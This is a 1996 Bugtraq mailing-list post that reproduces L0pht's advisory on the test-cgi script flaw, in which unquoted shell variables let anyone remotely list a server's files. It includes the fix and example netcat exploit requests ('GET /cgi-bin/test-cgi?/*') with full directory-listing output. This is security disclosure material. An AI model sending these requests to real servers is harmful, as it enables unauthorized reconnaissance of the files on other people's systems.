Bugtraq mailing list archives
Re: Vulnrability in test-cgi...
From: jaltuve () ibm net (Jesus Altuve)
Date: Mon, 2 Dec 1996 19:45:58 -0400
Safe??? there's a way to inventory the files on a server using the TEST-CGI program! (on certain setups) here's the advisory L0pth released on April.. Regards, _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ Jesus E. Altuve L. IcePick (On IRC Efnet) jaltuve () chevere com Tel. 58(2) 908.83.15 Caracas, Venezuela Fax. 58(2) 959.21.10 **** **** http://www.chevere.com 'Venezuela's Search Engine' _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ ---------------------------------------------------------------------------- - [ Advisory released April 1996 ] L0pht Report test-cgi vulnerability in certain setups Affected Program: test-cgi scripts found on various web servers. Severity: Anyone can remotely inventory the files on a machine. Author: mudge () l0pht com Synopsis: On many web sites there exists a file called test-cgi (usually in the cgi-bin directory or somewhere similar). There is a problem with many of these test-cgi files. If your test-cgi file contains the following line (verbatim) then you are probably vulnerable. echo QUERY_STRING = $QUERY_STRING All of these lines should have the variables enclosed in loose quotes ("). Without these quotes certain special characters (specifically '*') get expanded where they shouldn't. Thus submitting a query of '*' will return the contents of the current directory (probably where all of the cgi files are... gee, there's jj and phf. Hmmm what are all those other cgi's that I haven't seen... wonder what holes exist in those?). Sending in a query of '/*' will list the root directory. And so on, and so on. This is the same as doing `echo *` when you've blown away 'ls' (not that this ever happens to anyone <grin>). The easiest way to list out the directories is via the query string. However, it is possible to do the same thing through many of the other variables (ie $REMOTE_HOST, $REMOTE_USER, etc.) in the right situations. Fix: The quick fix is to place loose quotes around all of the variables in the test-cgi file (they should have been there from the beginning!). echo QUERY_STRING = "$QUERY_STRING" This incorrect file has been seen in at least several versions of NCSA, and Apache. Example exploit: Below are examples (nc is netcat from avian.org, if you don't have it you should get it as it is an invaluable tool. You can always just telnet to port 80 and type in the GET... command.) ------------------ machine% echo "GET /cgi-bin/test-cgi?/*" | nc removed.name.com 80 CGI/1.0 test script report: argc is 1. argv is /\*. SERVER_SOFTWARE = NCSA/1.4.1 SERVER_NAME = removed.name.com GATEWAY_INTERFACE = CGI/1.1 SERVER_PROTOCOL = HTTP/0.9 SERVER_PORT = 80 REQUEST_METHOD = GET HTTP_ACCEPT = PATH_INFO = PATH_TRANSLATED = SCRIPT_NAME = /bin/cgi-bin/test-cgi QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib /mnt /root /sbin /stand /sys /tmp /usr /usr2 /var REMOTE_HOST = remote.machine.com REMOTE_ADDR = 255.255.255.255 REMOTE_USER = AUTH_TYPE = CONTENT_TYPE = CONTENT_LENGTH = ------------------ Or to see what other cgi-goodies are still floating around... ------------------ machine% echo "GET /cgi-bin/test-cgi?*" | nc removed.name.com 80 CGI/1.0 test script report: argc is 1. argv is \*. SERVER_SOFTWARE = NCSA/1.4.1 SERVER_NAME = removed.name.com GATEWAY_INTERFACE = CGI/1.1 SERVER_PROTOCOL = HTTP/0.9 SERVER_PORT = 80 REQUEST_METHOD = GET HTTP_ACCEPT = PATH_INFO = PATH_TRANSLATED = SCRIPT_NAME = /bin/cgi-bin/test-cgi QUERY_STRING = calendar cgi-archie cgi-calendar cgi-date cgi-finger cgi-fortune cgi-lib.pl imagemap imagemap.cgi imagemap.conf index.html mail-query mail-query-2 majordomo majordomo.cf marker.cgi menu message.cgi munger.cgi munger.note ncsa-default.tar post-query query smartlist.cf src subscribe.cf test-cgi uptime REMOTE_HOST = remote.machine.com REMOTE_ADDR = 255.255.255.255 REMOTE_USER = AUTH_TYPE = CONTENT_TYPE = CONTENT_LENGTH =
Current thread:
- Vulnrability in test-cgi... Apropos of Nothing (Nov 30)
- denial of service attack on login NuNO (Dec 01)
- Re: Vulnrability in test-cgi... Roger Espel Llima (Dec 01)
- Little feature/bug in RedHat Linux Antti Andreimann (Dec 01)
- Users can modify routing in AIX 4.1 Dave Roberts (Dec 02)
- Re: Users can modify routing in AIX 4.1 Troy Bollinger (Dec 02)
- <Possible follow-ups>
- Re: Vulnrability in test-cgi... Jesus Altuve (Dec 02)
- Re: Vulnrability in test-cgi... Joe Zbiciak (Dec 02)
- /bin/ksh sparc code Kichang Yang (Dec 03)
- AltaVista Firewall for UNIX Sarah Keating (Dec 03)